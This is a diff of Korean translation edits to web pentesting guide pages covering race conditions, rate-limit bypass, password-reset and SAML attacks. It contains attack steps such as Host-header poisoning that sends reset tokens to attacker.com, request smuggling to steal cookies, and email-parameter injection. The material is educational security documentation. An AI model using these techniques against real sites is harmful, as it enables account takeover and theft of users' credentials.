-따라서 **계정을 등록하고 빈 토큰**(`token=` 또는 `token[]=` 또는 기타 변형)을 사용하여 여러 요청을 보내 즉시 계정을 확인하면 이메일을 제어하지 않는 **계정을 확인할 수 있습니다.**
+따라서 **계정을 등록하고 빈 토큰**(`token=` 또는 `token[]=` 또는 기타 변형)을 사용하여 여러 요청을 보내면 **이메일을 제어하지 않는 계정을 확인할 수 있습니다.**
 
 **이것을 확인하세요** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction) **에서 시도해 보세요.**
 
 ### 2FA 우회
 
-다음의 의사 코드는 레이스 조건에 취약합니다. 왜냐하면 세션이 생성되는 동안 **2FA가 적용되지 않는** 매우 짧은 시간이 있기 때문입니다:
+다음 의사 코드는 경쟁 조건에 취약합니다. 왜냐하면 세션이 생성되는 동안 **2FA가 적용되지 않는** 매우 짧은 시간이 있기 때문입니다:
 ```python
 session['userid'] = user.userid
 if user.mfa_enabled:
@@ -358,11 +358,11 @@ session['enforce_mfa'] = True
 ### OAuth2 영구 지속성
 
 여러 [**OAUth 제공자**](https://en.wikipedia.org/wiki/List_of_OAuth_providers)가 있습니다. 이러한 서비스는 애플리케이션을 생성하고 제공자가 등록한 사용자를 인증할 수 있게 해줍니다. 이를 위해 **클라이언트**는 **귀하의 애플리케이션**이 **OAUth 제공자** 내의 일부 데이터에 접근할 수 있도록 **허용해야** 합니다.\
-여기까지는 구글/링크드인/깃허브 등에서 "_애플리케이션 \<InsertCoolName>이 귀하의 정보에 접근하고자 합니다. 허용하시겠습니까?_"라는 페이지가 표시되는 일반적인 로그인입니다.
+여기까지는 구글/링크드인/깃허브 등으로 로그인할 때와 같은 일반적인 로그인 과정으로, "_애플리케이션 \<InsertCoolName>이 귀하의 정보에 접근하고자 합니다. 허용하시겠습니까?_"라는 페이지가 표시됩니다.
 
 #### `authorization_code`의 경쟁 조건
 
-**문제**는 사용자가 **허용**을 클릭하고 악의적인 애플리케이션에 **`authorization_code`**를 자동으로 전송할 때 발생합니다. 그러면 이 **애플리케이션은 OAUth 서비스 제공자의 경쟁 조건을 악용하여 귀하의 계정에 대해 **`authorization_code`**로부터 여러 개의 AT/RT** (_인증 토큰/리프레시 토큰_)를 생성합니다. 기본적으로, 애플리케이션이 귀하의 데이터에 접근하도록 허용한 사실을 악용하여 **여러 계정을 생성**하게 됩니다. 그런 다음, 애플리케이션이 귀하의 데이터에 접근하는 것을 **중지하면 AT/RT 쌍 중 하나는 삭제되지만, 나머지는 여전히 유효합니다**.
+**문제**는 사용자가 **허용**을 클릭하고 악의적인 애플리케이션에 **`authorization_code`**를 자동으로 전송할 때 발생합니다. 그러면 이 **애플리케이션은 OAUth 서비스 제공자의 경쟁 조건을 악용하여 귀하의 계정에 대해 **`authorization_code`**로부터 하나 이상의 AT/RT** (_인증 토큰/리프레시 토큰_)를 생성합니다. 기본적으로, 애플리케이션이 귀하의 데이터에 접근하도록 허용한 사실을 악용하여 **여러 계정을 생성**하게 됩니다. 그런 다음, 애플리케이션이 귀하의 데이터에 접근하는 것을 **중지하면 AT/RT 쌍 중 하나는 삭제되지만, 나머지는 여전히 유효합니다**.
 
 #### `Refresh Token`의 경쟁 조건
 
@@ -370,7 +370,7 @@ session['enforce_mfa'] = True
 
 ## **웹소켓의 RC**
 
-[**WS_RaceCondition_PoC**](https://github.com/redrays-io/WS_RaceCondition_PoC)에서 웹소켓 메시지를 **병렬로** 전송하여 **웹소켓에서도 경쟁 조건을 악용하는** PoC를 찾을 수 있습니다.
+[**WS_RaceCondition_PoC**](https://github.com/redrays-io/WS_RaceCondition_PoC)에서 **웹소켓** 메시지를 **병렬로** 전송하여 **웹소켓에서도 경쟁 조건을 악용**하는 Java PoC를 찾을 수 있습니다.
 
 ## 참고 문헌
 
diff --git a/src/pentesting-web/rate-limit-bypass.md b/src/pentesting-web/rate-limit-bypass.md
index 18d260cf0..557077b30 100644
--- a/src/pentesting-web/rate-limit-bypass.md
+++ b/src/pentesting-web/rate-limit-bypass.md
@@ -34,7 +34,7 @@ user-agent 및 쿠키와 같은 다른 요청 헤더를 변경하는 것이 권
 
 ### API 게이트웨이 동작 활용하기
 
-일부 API 게이트웨이는 엔드포인트와 매개변수의 조합에 따라 속도 제한을 적용하도록 구성되어 있습니다. 매개변수 값을 변경하거나 요청에 중요하지 않은 매개변수를 추가함으로써 게이트웨이의 속도 제한 논리를 우회할 수 있으며, 각 요청이 고유하게 보이도록 만들 수 있습니다. 예를 들어 `/resetpwd?someparam=1`.
+일부 API 게이트웨이는 엔드포인트와 매개변수의 조합에 따라 속도 제한을 적용하도록 구성되어 있습니다. 매개변수 값을 변경하거나 중요하지 않은 매개변수를 요청에 추가함으로써 게이트웨이의 속도 제한 논리를 우회할 수 있으며, 각 요청이 고유하게 보이도록 만들 수 있습니다. 예를 들어 `/resetpwd?someparam=1`.
 
 ### 각 시도 전에 계정에 로그인하기
 
@@ -42,7 +42,7 @@ user-agent 및 쿠키와 같은 다른 요청 헤더를 변경하는 것이 권
 
 ### 프록시 네트워크 활용하기
 
-여러 IP 주소에 요청을 분산시키기 위해 프록시 네트워크를 배포하면 IP 기반 속도 제한을 효과적으로 우회할 수 있습니다. 다양한 프록시를 통해 트래픽을 라우팅함으로써 각 요청이 다른 출처에서 발생하는 것처럼 보이게 하여 속도 제한의 효과를 희석시킬 수 있습니다.
+여러 IP 주소에 요청을 분산시키기 위해 프록시 네트워크를 배포하면 IP 기반 속도 제한을 효과적으로 우회할 수 있습니다. 다양한 프록시를 통해 트래픽을 라우팅하면 각 요청이 다른 출처에서 발생하는 것처럼 보이므로 속도 제한의 효과가 희석됩니다.
 
 ### 다른 계정이나 세션에 공격 분산하기
 
@@ -50,6 +50,6 @@ user-agent 및 쿠키와 같은 다른 요청 헤더를 변경하는 것이 권
 
 ### 계속 시도하기
 
-속도 제한이 설정되어 있더라도 유효한 OTP가 전송될 때 응답이 다른지 확인해 보아야 합니다. [**이 게시물**](https://mokhansec.medium.com/the-2-200-ato-most-bug-hunters-overlooked-by-closing-intruder-too-soon-505f21d56732)에서 버그 헌터는 20번의 실패한 시도 후 401로 응답하더라도 속도 제한이 발생하더라도 유효한 OTP가 전송되면 200 응답을 받았다는 것을 발견했습니다.
+속도 제한이 설정되어 있더라도 유효한 OTP가 전송될 때 응답이 다른지 확인해 보아야 합니다. [**이 게시물**](https://mokhansec.medium.com/the-2-200-ato-most-bug-hunters-overlooked-by-closing-intruder-too-soon-505f21d56732)에서 버그 헌터는 20번의 실패한 시도 후 401로 응답하여 속도 제한이 발생하더라도 유효한 OTP가 전송되면 200 응답을 받았다는 것을 발견했습니다.
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/registration-vulnerabilities.md b/src/pentesting-web/registration-vulnerabilities.md
index 8305be5a2..2869087b5 100644
--- a/src/pentesting-web/registration-vulnerabilities.md
+++ b/src/pentesting-web/registration-vulnerabilities.md
@@ -27,7 +27,7 @@
 
 ### SQL 인젝션
 
-[**이 페이지를 확인하세요** ](sql-injection/#insert-statement)계정 인수 또는 **SQL 인젝션**을 통해 정보를 추출하는 방법을 배우세요.
+[**이 페이지를 확인하세요** ](sql-injection/#insert-statement)계정 인수 또는 **SQL 인젝션**을 통해 정보 추출을 시도하는 방법을 배우세요.
 
 ### Oauth 인수
 
@@ -47,29 +47,29 @@ saml-attacks/
 
 ### 추가 확인 사항
 
-- **일회용 이메일** 사용 여부 확인
+- **일회용 이메일** 사용 가능 여부 확인
 - **긴** **비밀번호** (>200)는 **DoS**로 이어짐
 - **계정 생성에 대한 비율 제한 확인**
-- username@**burp_collab**.net을 사용하고 **콜백**을 분석하세요.
+- username@**burp_collab**.net을 사용하고 **콜백** 분석
 
 ## **비밀번호 재설정 인수**
 
 ### 참조자를 통한 비밀번호 재설정 토큰 유출 <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
 
-1. 비밀번호 재설정을 위해 이메일 주소로 요청하세요.
-2. 비밀번호 재설정 링크를 클릭하세요.
-3. 비밀번호를 변경하지 마세요.
-4. 3자 웹사이트(예: Facebook, Twitter)를 클릭하세요.
-5. Burp Suite 프록시에서 요청을 가로채세요.
+1. 비밀번호 재설정을 위해 이메일 주소로 요청
+2. 비밀번호 재설정 링크 클릭
+3. 비밀번호 변경하지 않기
+4. 3자 웹사이트 클릭 (예: Facebook, Twitter)
+5. Burp Suite 프록시에서 요청 가로채기
 6. referer 헤더가 비밀번호 재설정 토큰을 유출하는지 확인하세요.
 
 ### 비밀번호 재설정 중독 <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
 
-1. Burp Suite에서 비밀번호 재설정 요청을 가로채세요.
-2. Burp Suite에서 다음 헤더를 추가하거나 수정하세요: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
-3. 수정된 헤더로 요청을 전달하세요.\
+1. Burp Suite에서 비밀번호 재설정 요청 가로채기
+2. Burp Suite에서 다음 헤더 추가 또는 수정: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
+3. 수정된 헤더로 요청 전달\
 `http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
-4. _host 헤더_를 기반으로 한 비밀번호 재설정 URL을 찾으세요: `https://attacker.com/reset-password.php?token=TOKEN`
+4. _host 헤더_를 기반으로 한 비밀번호 재설정 URL 찾기: `https://attacker.com/reset-password.php?token=TOKEN`
 
 ### 이메일 매개변수를 통한 비밀번호 재설정 <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
 ```powershell
@@ -98,12 +98,12 @@ email=victim@mail.com|hacker@mail.com
 ### Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
 
 비밀번호 재설정 토큰은 매번 무작위로 생성되고 고유해야 합니다.\
-토큰이 만료되는지 또는 항상 동일한지 확인하십시오. 경우에 따라 생성 알고리즘이 약하고 추측할 수 있습니다. 다음 변수들이 알고리즘에 사용될 수 있습니다.
+토큰이 만료되는지 또는 항상 동일한지 확인하십시오. 경우에 따라 생성 알고리즘이 약하고 추측할 수 있습니다. 알고리즘에서 사용될 수 있는 변수는 다음과 같습니다.
 
 - 타임스탬프
 - 사용자 ID
 - 사용자 이메일
-- 이름과 성
+- 이름 및 성
 - 생년월일
 - 암호화
 - 숫자만
@@ -129,15 +129,15 @@ email=victim@mail.com|hacker@mail.com
 
 ### Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
 
-1. 애플리케이션 내 또는 쿠키가 상위 도메인에 범위가 지정된 경우 서브도메인에서 XSS를 찾습니다: `*.domain.com`
+1. 애플리케이션 내 또는 쿠키가 상위 도메인에 범위가 지정된 경우 하위 도메인에서 XSS를 찾습니다: `*.domain.com`
 2. 현재 **세션 쿠키**를 유출합니다.
 3. 쿠키를 사용하여 사용자로 인증합니다.
 
 ### Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
 
-1\. **smuggler**를 사용하여 HTTP 요청 밀반입 유형을 감지합니다 (CL, TE, CL.TE)\
+1\. **smuggler**를 사용하여 HTTP 요청 밀수의 유형을 감지합니다 (CL, TE, CL.TE)\
 `powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
-2\. 다음 데이터로 `POST / HTTP/1.1`를 덮어쓸 요청을 작성합니다:\
+2\. 다음 데이터를 사용하여 `POST / HTTP/1.1`를 덮어쓸 요청을 작성합니다:\
 `GET http://something.burpcollaborator.net HTTP/1.1 X:` 피해자를 burpcollab로 리디렉션하고 쿠키를 훔치는 것이 목표입니다.\
 3\. 최종 요청은 다음과 같을 수 있습니다.
 ```
diff --git a/src/pentesting-web/regular-expression-denial-of-service-redos.md b/src/pentesting-web/regular-expression-denial-of-service-redos.md
index b3add0282..7796f6a8d 100644
--- a/src/pentesting-web/regular-expression-denial-of-service-redos.md
+++ b/src/pentesting-web/regular-expression-denial-of-service-redos.md
@@ -4,7 +4,7 @@
 
 # 정규 표현식 서비스 거부 (ReDoS)
 
-**정규 표현식 서비스 거부 (ReDoS)**는 누군가가 정규 표현식(텍스트에서 패턴을 검색하고 일치시키는 방법)의 작동 방식의 약점을 이용할 때 발생합니다. 때때로 정규 표현식을 사용할 때, 처리하는 텍스트 조각이 커질수록 매우 느려질 수 있습니다. 이 느림은 텍스트 크기가 조금만 증가해도 매우 빠르게 증가할 수 있습니다. 공격자는 이 문제를 이용하여 정규 표현식을 사용하는 프로그램이 오랫동안 제대로 작동하지 않도록 만들 수 있습니다.
+**정규 표현식 서비스 거부 (ReDoS)**는 누군가가 정규 표현식(텍스트에서 패턴을 검색하고 일치시키는 방법)의 작동 방식의 약점을 이용할 때 발생합니다. 때때로 정규 표현식이 사용될 때, 처리하는 텍스트 조각이 커질수록 매우 느려질 수 있습니다. 이 느림은 텍스트 크기가 조금만 증가해도 매우 빠르게 증가할 수 있습니다. 공격자는 이 문제를 이용하여 정규 표현식을 사용하는 프로그램이 오랫동안 제대로 작동하지 않도록 만들 수 있습니다.
 
 ## 문제의 정규 표현식 단순 알고리즘
 
diff --git a/src/pentesting-web/reset-password.md b/src/pentesting-web/reset-password.md
index f3ae46627..039d51fca 100644
--- a/src/pentesting-web/reset-password.md
+++ b/src/pentesting-web/reset-password.md
@@ -6,7 +6,7 @@
 
 - HTTP referer 헤더는 URL에 포함된 경우 비밀번호 재설정 토큰을 유출할 수 있습니다. 이는 사용자가 비밀번호 재설정을 요청한 후 제3자 웹사이트 링크를 클릭할 때 발생할 수 있습니다.
 - **영향**: 교차 사이트 요청 위조(CSRF) 공격을 통한 계정 탈취 가능성.
-- **악용**: referer 헤더에서 비밀번호 재설정 토큰이 유출되고 있는지 확인하려면, **비밀번호 재설정을 요청**하여 이메일 주소로 보내고 **제공된 재설정 링크를 클릭**하십시오. **즉시 비밀번호를 변경하지 마십시오**. 대신, **Burp Suite를 사용하여 요청을 가로채면서** **제3자 웹사이트**(예: Facebook 또는 Twitter)로 이동하십시오. 요청을 검사하여 **referer 헤더에 비밀번호 재설정 토큰이 포함되어 있는지** 확인하십시오. 이는 제3자에게 민감한 정보를 노출할 수 있습니다.
+- **악용**: referer 헤더에서 비밀번호 재설정 토큰이 유출되고 있는지 확인하려면, **비밀번호 재설정을 요청**하여 이메일 주소로 **재설정 링크를 클릭**하십시오. **즉시 비밀번호를 변경하지 마십시오**. 대신, **Burp Suite를 사용하여 요청을 가로채면서** **제3자 웹사이트**(예: Facebook 또는 Twitter)로 이동하십시오. 요청을 검사하여 **referer 헤더에 비밀번호 재설정 토큰이 포함되어 있는지** 확인하십시오. 이는 제3자에게 민감한 정보를 노출할 수 있습니다.
 - **참조**:
 - [HackerOne Report 342693](https://hackerone.com/reports/342693)
 - [HackerOne Report 272379](https://hackerone.com/reports/272379)
@@ -15,11 +15,11 @@
 ## **비밀번호 재설정 중독**
 
 - 공격자는 비밀번호 재설정 요청 중에 Host 헤더를 조작하여 재설정 링크를 악성 사이트로 유도할 수 있습니다.
-- **영향**: 재설정 토큰이 공격자에게 유출되어 계정 탈취 가능성.
+- **영향**: 재설정 토큰을 공격자에게 유출하여 계정 탈취 가능성.
 - **완화 조치**:
-- 허용된 도메인의 화이트리스트에 대해 Host 헤더를 검증하십시오.
-- 절대 URL을 생성하기 위해 안전한 서버 측 방법을 사용하십시오.
-- **패치**: `$_SERVER['HTTP_HOST']` 대신 `$_SERVER['SERVER_NAME']`을 사용하여 비밀번호 재설정 URL을 구성하십시오.
+- 허용된 도메인의 화이트리스트에 대해 Host 헤더를 검증합니다.
+- 절대 URL을 생성하기 위해 안전한 서버 측 방법을 사용합니다.
+- **패치**: `$_SERVER['HTTP_HOST']` 대신 `$_SERVER['SERVER_NAME']`을 사용하여 비밀번호 재설정 URL을 구성합니다.
 - **참조**:
 - [비밀번호 재설정 중독에 대한 Acunetix 기사](https://www.acunetix.com/blog/articles/password-reset-poisoning/)
 
@@ -27,7 +27,7 @@
 
 공격자는 추가 이메일 매개변수를 추가하여 비밀번호 재설정 요청을 조작하여 재설정 링크를 전환할 수 있습니다.
 
-- &를 사용하여 두 번째 매개변수로 공격자 이메일 추가
+- &를 사용하여 공격자 이메일을 두 번째 매개변수로 추가합니다.
 ```php
 POST /resetPassword
 [...]
@@ -70,7 +70,7 @@ POST /resetPassword
 {"email":["victim@mail.tld","atracker@mail.tld"]}
 ```
 - **완화 단계**:
-- 서버 측에서 이메일 매개변수를 적절하게 구문 분석하고 검증합니다.
+- 이메일 매개변수를 서버 측에서 적절하게 구문 분석하고 검증합니다.
 - 주입 공격을 방지하기 위해 준비된 문이나 매개변수화된 쿼리를 사용합니다.
 - **참조**:
 - [https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be](https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be)
diff --git a/src/pentesting-web/reverse-tab-nabbing.md b/src/pentesting-web/reverse-tab-nabbing.md
index 414bee59a..f1da0587f 100644
--- a/src/pentesting-web/reverse-tab-nabbing.md
+++ b/src/pentesting-web/reverse-tab-nabbing.md
@@ -63,7 +63,7 @@ window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
 - **`opener.closed`**: 이 속성은 창이 닫혔는지 여부를 확인하기 위해 접근되며, 불리언 값을 반환합니다.
 - **`opener.frames`**: 이 속성은 현재 창 내의 모든 iframe 요소에 대한 접근을 제공합니다.
 - **`opener.length`**: 현재 창에 존재하는 iframe 요소의 수를 이 속성이 반환합니다.
-- **`opener.opener`**: 이 속성을 통해 현재 창을 연 창에 대한 참조를 얻을 수 있습니다.
+- **`opener.opener`**: 현재 창을 연 창에 대한 참조를 이 속성을 통해 얻을 수 있습니다.
 - **`opener.parent`**: 이 속성은 현재 창의 부모 창을 반환합니다.
 - **`opener.self`**: 이 속성은 현재 창 자체에 대한 접근을 제공합니다.
 - **`opener.top`**: 이 속성은 가장 상위의 브라우저 창을 반환합니다.
diff --git a/src/pentesting-web/saml-attacks/README.md b/src/pentesting-web/saml-attacks/README.md
index 539120596..57c014d94 100644
--- a/src/pentesting-web/saml-attacks/README.md
+++ b/src/pentesting-web/saml-attacks/README.md
@@ -16,7 +16,7 @@ saml-basics.md
 
 ## XML 왕복
 
-XML에서 XML의 서명된 부분은 메모리에 저장되고, 그 다음 인코딩/디코딩이 수행되며 서명이 확인됩니다. 이상적으로 그 인코딩/디코딩은 데이터를 변경하지 않아야 하지만, 그 시나리오에 기반할 때, **확인되는 데이터와 원본 데이터는 같지 않을 수 있습니다**.
+XML에서 XML의 서명된 부분은 메모리에 저장되고, 그 후 일부 인코딩/디코딩이 수행되며 서명이 확인됩니다. 이상적으로 그 인코딩/디코딩은 데이터를 변경하지 않아야 하지만, 그 시나리오에 기반할 때, **확인되는 데이터와 원본 데이터는 같지 않을 수 있습니다**.
 
 예를 들어, 다음 코드를 확인하십시오:
 ```ruby
@@ -33,7 +33,7 @@ puts "First child in original doc: " + doc.root.elements[1].name
 doc = REXML::Document.new doc.to_s
 puts "First child after round-trip: " + doc.root.elements[1].name
 ```
-REXML 3.2.4 또는 이전 버전에서 프로그램을 실행하면 대신 다음과 같은 출력이 생성됩니다:
+REXML 3.2.4 또는 그 이전 버전에서 프로그램을 실행하면 다음과 같은 출력이 대신 나타납니다:
 ```
 First child in original doc: Y
 First child after round-trip: Z
@@ -46,16 +46,16 @@ REXML이 위 프로그램의 원래 XML 문서를 본 방식은 다음과 같습
 
 ![https://mattermost.com/blog/securing-xml-implementations-across-the-web/](<../../images/image (445).png>)
 
-취약점 및 이를 악용하는 방법에 대한 자세한 정보는 다음을 참조하십시오:
+취약점 및 이를 악용하는 방법에 대한 자세한 정보는 다음을 참조하세요:
 
 - [https://mattermost.com/blog/securing-xml-implementations-across-the-web/](https://mattermost.com/blog/securing-xml-implementations-across-the-web/)
 - [https://joonas.fi/2021/08/saml-is-insecure-by-design/](https://joonas.fi/2021/08/saml-is-insecure-by-design/)
 
 ## XML 서명 래핑 공격
 
-**XML 서명 래핑 공격(XSW)**에서는 적들이 XML 문서가 두 가지 별도의 단계인 **서명 검증**과 **함수 호출**을 통해 처리될 때 발생하는 취약점을 악용합니다. 이러한 공격은 XML 문서 구조를 변경하는 것을 포함합니다. 구체적으로, 공격자는 XML 서명의 유효성을 손상시키지 않는 **위조된 요소**를 주입합니다. 이 조작은 **애플리케이션 로직**에서 분석되는 요소와 **서명 검증 모듈**에서 확인되는 요소 간의 불일치를 생성하는 것을 목표로 합니다. 결과적으로 XML 서명은 기술적으로 유효하며 검증을 통과하지만, 애플리케이션 로직은 **사기성 요소**를 처리합니다. 따라서 공격자는 XML 서명의 **무결성 보호** 및 **출처 인증**을 효과적으로 우회하여 **임의의 콘텐츠 주입**을 탐지 없이 수행할 수 있습니다.
+**XML 서명 래핑 공격(XSW)**에서는 적대자가 XML 문서가 두 가지 별도의 단계인 **서명 검증**과 **함수 호출**을 통해 처리될 때 발생하는 취약점을 악용합니다. 이러한 공격은 XML 문서 구조를 변경하는 것을 포함합니다. 구체적으로, 공격자는 XML 서명의 유효성을 손상시키지 않는 **위조된 요소**를 주입합니다. 이 조작은 **애플리케이션 로직**에서 분석되는 요소와 **서명 검증 모듈**에서 확인되는 요소 간의 불일치를 생성하는 것을 목표로 합니다. 결과적으로 XML 서명은 기술적으로 유효하며 검증을 통과하지만, 애플리케이션 로직은 **사기성 요소**를 처리합니다. 따라서 공격자는 XML 서명의 **무결성 보호** 및 **출처 인증**을 효과적으로 우회하여 **임의의 콘텐츠 주입**을 탐지 없이 수행할 수 있습니다.
 
-다음 공격은 [**이 블로그 게시물**](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/) **및** [**이 논문**](https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91.pdf)을 기반으로 합니다. 따라서 추가 세부정보는 해당 내용을 확인하십시오.
+다음 공격은 [**이 블로그 게시물**](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/) **및** [**이 논문**](https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91.pdf)을 기반으로 합니다. 따라서 추가 세부정보는 해당 자료를 확인하세요.
 
 ### XSW #1
 
@@ -67,7 +67,7 @@ REXML이 위 프로그램의 원래 XML 문서를 본 방식은 다음과 같습
 ### XSW #2
 
 - **XSW #1과의 차이점**: 포장 서명 대신 분리된 서명을 사용합니다.
-- **의미**: XSW #1과 유사한 "악의적인" 구조는 무결성 검사를 통과한 후 비즈니스 로직을 속이기 위한 것입니다.
+- **의미**: XSW #1과 유사한 "악의적인" 구조는 무결성 검사를 통과한 후 비즈니스 로직을 속이려는 목적입니다.
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-2.svg](<../../images/image (466).png>)
 
@@ -102,7 +102,7 @@ REXML이 위 프로그램의 원래 XML 문서를 본 방식은 다음과 같습
 ### XSW #7
 
 - **전략**: 복사된 어설션을 자식으로 하는 Extensions 요소가 삽입됩니다.
-- **의미**: 이 요소는 Extensions 요소의 덜 제한적인 스키마를 악용하여 OpenSAML과 같은 라이브러리에서 스키마 검증 방어 수단을 우회합니다.
+- **의미**: 이 공격은 Extensions 요소의 덜 제한적인 스키마를 악용하여 OpenSAML과 같은 라이브러리에서 스키마 검증 방어 수단을 우회합니다.
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-7.svg](<../../images/image (971).png>)
 
@@ -119,13 +119,13 @@ Burp 확장 [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4
 
 ## XXE
 
-XXE 공격이 어떤 것인지 모른다면 다음 페이지를 읽어보십시오:
+XXE 공격이 어떤 것인지 모른다면 다음 페이지를 읽어보세요:
 
 {{#ref}}
 ../xxe-xee-xml-external-entity.md
 {{#endref}}
 
-SAML 응답은 **압축 해제되고 base64로 인코딩된 XML 문서**이며 XML 외부 엔터티(XXE) 공격에 취약할 수 있습니다. SAML 응답의 XML 구조를 조작함으로써 공격자는 XXE 취약점을 악용하려고 시도할 수 있습니다. 이러한 공격이 어떻게 시각화될 수 있는지 다음과 같습니다:
+SAML 응답은 **압축 해제되고 base64로 인코딩된 XML 문서**이며 XML 외부 엔티티(XXE) 공격에 취약할 수 있습니다. SAML 응답의 XML 구조를 조작함으로써 공격자는 XXE 취약점을 악용하려고 시도할 수 있습니다. 이러한 공격이 어떻게 시각화될 수 있는지 다음과 같습니다:
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [
@@ -157,7 +157,7 @@ XSLT에 대한 자세한 정보는 다음을 참조하세요:
 ../xslt-server-side-injection-extensible-stylesheet-language-transformations.md
 {{#endref}}
 
-확장 가능한 스타일시트 언어 변환( XSLT )은 XML 문서를 HTML, JSON 또는 PDF와 같은 다양한 형식으로 변환하는 데 사용할 수 있습니다. **XSLT 변환은 디지털 서명의 검증 전에 수행된다는 점을 주의해야 합니다.** 이는 유효한 서명이 없더라도 공격이 성공할 수 있음을 의미합니다. 자체 서명된 서명이나 유효하지 않은 서명으로도 진행할 수 있습니다.
+확장 가능한 스타일시트 언어 변환( XSLT )은 XML 문서를 HTML, JSON 또는 PDF와 같은 다양한 형식으로 변환하는 데 사용할 수 있습니다. **XSLT 변환은 디지털 서명의 검증 전에 수행된다는 점이 중요합니다.** 이는 유효한 서명이 없더라도 공격이 성공할 수 있음을 의미합니다. 자체 서명된 서명이나 유효하지 않은 서명으로도 진행할 수 있습니다.
 
 여기에서 이러한 종류의 취약점을 확인할 수 있는 **POC**를 찾을 수 있으며, 이 섹션의 시작 부분에 언급된 hacktricks 페이지에서 페이로드를 찾을 수 있습니다.
 ```xml
@@ -179,51 +179,51 @@ XSLT에 대한 자세한 정보는 다음을 참조하세요:
 ...
 </ds:Signature>
 ```
-### Tool
+### 도구
 
 Burp 확장 프로그램 [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)를 사용하여 SAML 요청에서 POC를 생성하여 가능한 XSLT 취약점을 테스트할 수 있습니다.
 
 또한 이 강연도 확인해 보세요: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www.youtube.com/watch?v=WHn-6xHL7mI)
 
-## XML Signature Exclusion <a href="#xml-signature-exclusion" id="xml-signature-exclusion"></a>
+## XML 서명 제외 <a href="#xml-signature-exclusion" id="xml-signature-exclusion"></a>
 
-**XML Signature Exclusion**은 Signature 요소가 없을 때 SAML 구현의 동작을 관찰합니다. 이 요소가 누락되면 **서명 검증이 발생하지 않을 수 있으며**, 이는 취약점을 초래합니다. 서명에 의해 일반적으로 검증되는 내용을 변경하여 이를 테스트할 수 있습니다.
+**XML 서명 제외**는 서명 요소가 없을 때 SAML 구현의 동작을 관찰합니다. 이 요소가 누락되면 **서명 검증이 발생하지 않을 수 있으며**, 이는 취약점을 초래합니다. 서명에 의해 일반적으로 검증되는 내용을 변경하여 이를 테스트할 수 있습니다.
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/signature-exclusion.svg](<../../images/image (457).png>)
 
-### Tool <a href="#xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a>
+### 도구 <a href="#xml-signature-exclusion-how-to" id="xml-signature-exclusion-how-to"></a>
 
-Burp 확장 프로그램 [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)를 사용할 수 있습니다. SAML 응답을 가로채고 `Remove Signatures`를 클릭합니다. 이렇게 하면 **모든** Signature 요소가 제거됩니다.
+Burp 확장 프로그램 [**SAML Raider**](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e)를 사용할 수 있습니다. SAML 응답을 가로채고 `Remove Signatures`를 클릭합니다. 이렇게 하면 **모든** 서명 요소가 제거됩니다.
 
-서명이 제거된 상태에서 요청이 대상에게 진행되도록 허용합니다. 서비스에서 서명이 필요하지 않다면
+서명이 제거된 상태에서 요청이 대상에게 진행되도록 허용합니다. 서비스에서 서명이 필요하지 않은 경우
 
-## Certificate Faking <a href="#certificate-faking" id="certificate-faking"></a>
+## 인증서 위조 <a href="#certificate-faking" id="certificate-faking"></a>
 
-## Certificate Faking
+## 인증서 위조
 
-Certificate Faking은 **서비스 제공자(SP)가 SAML 메시지가 신뢰할 수 있는 ID 공급자(IdP)에 의해 서명되었는지 제대로 검증하는지 테스트하는 기술**입니다. 이는 SAML 응답 또는 주장을 서명하기 위해 \***자체 서명된 인증서**를 사용하는 것을 포함하며, SP와 IdP 간의 신뢰 검증 프로세스를 평가하는 데 도움이 됩니다.
+인증서 위조는 **서비스 제공자(SP)가 SAML 메시지가 신뢰할 수 있는 ID 공급자(IdP)에 의해 서명되었는지 제대로 검증하는지 테스트하는 기술**입니다. 이는 SAML 응답 또는 주장을 서명하기 위해 \***자체 서명된 인증서**를 사용하는 것을 포함하며, SP와 IdP 간의 신뢰 검증 프로세스를 평가하는 데 도움이 됩니다.
 
-### How to Conduct Certificate Faking
+### 인증서 위조 수행 방법
 
 다음 단계는 [SAML Raider](https://portswigger.net/bappstore/c61cfa893bb14db4b01775554f7b802e) Burp 확장을 사용하여 프로세스를 설명합니다:
 
 1. SAML 응답을 가로챕니다.
 2. 응답에 서명이 포함되어 있으면 `Send Certificate to SAML Raider Certs` 버튼을 사용하여 인증서를 SAML Raider Certs로 보냅니다.
-3. SAML Raider Certificates 탭에서 가져온 인증서를 선택하고 `Save and Self-Sign`을 클릭하여 원본 인증서의 자체 서명된 복제본을 생성합니다.
